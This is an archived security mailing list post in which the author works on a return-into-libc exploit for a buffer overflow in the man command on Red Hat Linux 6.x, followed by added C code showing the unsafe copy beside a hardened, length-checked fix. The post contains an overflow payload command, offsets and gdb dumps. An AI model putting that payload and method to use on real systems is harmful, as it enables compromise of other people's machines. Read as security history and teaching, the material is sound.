Vulnerability Development mailing list archives
No-Exec Stack Smashing 101
From: lamont () ICOPYRIGHT COM (Granquist, Lamont)
Date: Wed, 19 Apr 2000 16:31:40 -0700
Thought I'd try to liven the discussion up here a bit... Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it). And I'm looking for a little help here.

What I've been playing with so far is things like the following, trying to sort out the parameters of the buffer overflow:

    setenv MANPAGER `perl -e 'print "A" x 4057; print "\xe0\xca\x05\x40";'`
    /usr/bin/man man
    gdb /usr/bin/man core

Now the goal is to make man do a system("/bin/echo i 0wn y3w") call via returning into system(), with the string being a parameter to the call, with no code being executed on the stack.

What I've found out is:

1. the RA is 4057 bytes beyond the start of the buffer
2. the beginning of the buffer is 0xbfffeae5
3. I have no idea how to properly call system()

#3 is where I need the help, since I'm relatively x86-architecture and linux-kernel-hacking inexperienced.

Using this:

    #include <stdio.h>
    #include <stdlib.h>   /* prototype for system() */

    int main(void)
    {
        system("/bin/echo foobar");
        return 0;
    }

I use gdb to disassemble to this:

    Dump of assembler code for function main:
    0x80483c8 <main>:       push   %ebp
    0x80483c9 <main+1>:     mov    %esp,%ebp
    0x80483cb <main+3>:     push   $0x8048430
    0x80483d0 <main+8>:     call   0x80482e8 <system>
    0x80483d5 <main+13>:    add    $0x4,%esp
    0x80483d8 <main+16>:    leave
    0x80483d9 <main+17>:    ret
    End of assembler dump.

So, this appears to be system():

    0x80483cb <main+3>:     push   $0x8048430
    0x80483d0 <main+8>:     call   0x80482e8 <system>
    0x80483d5 <main+13>:    add    $0x4,%esp

So, it looks like I tack "0xbfffeae5" after the RA at wherever the top of the stack winds up being and system() will pop that off and off we go. However, shoving 0x80482e8 into the RA like I naively assumed you could do doesn't appear to work. This is confirmed when I fire up gdb on the core file from man and try:

    (gdb) disassemble 0x80482e8
    No function contains specified address.

OTOH I noticed this:

    (gdb) disassemble system
    Dump of assembler code for function __libc_system:
    0x4005cae0 <__libc_system>:     push   %ebp
    0x4005cae1 <__libc_system+1>:   mov    %esp,%ebp
    0x4005cae3 <__libc_system+3>:   sub    $0x2c8,%esp
    0x4005cae9 <__libc_system+9>:   push   %edi
    0x4005caea <__libc_system+10>:  push   %esi
    0x4005caeb <__libc_system+11>:  push   %ebx
    0x4005caec <__libc_system+12>:  call   0x4005caf1 <__libc_system+17>
    0x4005caf1 <__libc_system+17>:  pop    %ebx
    0x4005caf2 <__libc_system+18>:  add    $0xaf6fb,%ebx
    [...blah...blah...blah...]

So, anyone got any tips for where to point the RA and what the stack should look like?
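The bug class behind this thread is an environment variable copied into a fixed-size stack buffer with no length check, which is what lets a 4057-byte value overwrite the saved return address. The following C is an added example written for this archive page; it is not code from the post, from man-1.5g, or from Red Hat. The buffer size PAGER_MAX, the function names and the 4057-byte 'A' string are constructed for illustration and are not taken from the man source. It shows the unsafe copy beside a hardened form that refuses anything that does not fit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size buffer; the size used by the real man binary is not
 * stated in the post, so this value is constructed for the example. */
#define PAGER_MAX 256

/* Unsafe pattern (the defect class discussed in the thread): copy an
 * attacker-controlled environment variable into a fixed-size buffer with no
 * length check.  Shown only beside its fix; it is only ever given short input
 * here. */
static void pager_copy_unsafe(const char *value, char buf[PAGER_MAX])
{
    strcpy(buf, value);            /* overflows buf once strlen(value) >= PAGER_MAX */
}

/* Hardened form: measure with an upper bound, reject a value that does not
 * fit together with its terminating NUL, and never silently truncate. */
static int pager_copy_safe(const char *value, char *buf, size_t bufsz)
{
    size_t n;

    if (buf == NULL || bufsz == 0)
        return -1;
    buf[0] = '\0';
    if (value == NULL)
        return -1;                 /* variable unset: caller falls back to a default pager */
    for (n = 0; n < bufsz && value[n] != '\0'; n++)
        ;                          /* bounded scan: never reads past bufsz bytes of value */
    if (n >= bufsz)
        return -1;                 /* too long: refuse rather than overflow or truncate */
    memcpy(buf, value, n + 1);     /* n + 1 copies the terminating NUL as well */
    return 0;
}

/* Returns 1 if the safe copy rejects a constructed value of `len` bytes of 'A',
 * 0 if it accepts it, -1 on allocation failure.  Used to show that an input
 * the size of the one in the post (4057 bytes) is refused. */
static int safe_rejects_length(size_t len)
{
    char buf[PAGER_MAX];
    char *value = malloc(len + 1);
    int rejected;

    if (value == NULL)
        return -1;
    memset(value, 'A', len);       /* constructed oversized environment value */
    value[len] = '\0';
    rejected = (pager_copy_safe(value, buf, sizeof buf) != 0);
    free(value);
    return rejected;
}

int main(void)
{
    char buf[PAGER_MAX];

    /* Benign input behaves the same either way; the difference only shows on
     * an oversized value, which the unsafe copy must never be given. */
    pager_copy_unsafe("less", buf);
    printf("unsafe copy of short value: %s\n", buf);

    if (pager_copy_safe("less", buf, sizeof buf) == 0)
        printf("safe copy accepted pager: %s\n", buf);

    printf("4057-byte value rejected: %s\n",
           safe_rejects_length(4057) == 1 ? "yes" : "no");
    printf("%d-byte value rejected: %s\n", PAGER_MAX - 1,
           safe_rejects_length(PAGER_MAX - 1) == 1 ? "yes" : "no");
    return 0;
}
```

A non-executable stack does not remove this bug, which is the point of the thread: returning into an existing libc function needs no code on the stack. Refusing the over-long value before the copy is what closes it, and the reject-rather-than-truncate choice keeps a caller from silently running a pager name it never intended.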
Current thread:
- No-Exec Stack Smashing 101 Granquist, Lamont (Apr 19)
- Re: No-Exec Stack Smashing 101 Crispin Cowan (Apr 19)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 Granquist, Lamont (Apr 20)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 Granquist, Lamont (Apr 20)
- Re: No-Exec Stack Smashing 101 Mariusz Woloszyn (Apr 21)
- Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions. Zoa_Chien (Apr 21)
- Re: Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions. Bob Fiero (Apr 21)
- Re: Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions. Ron DuFresne (Apr 21)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 Crispin Cowan (Apr 19)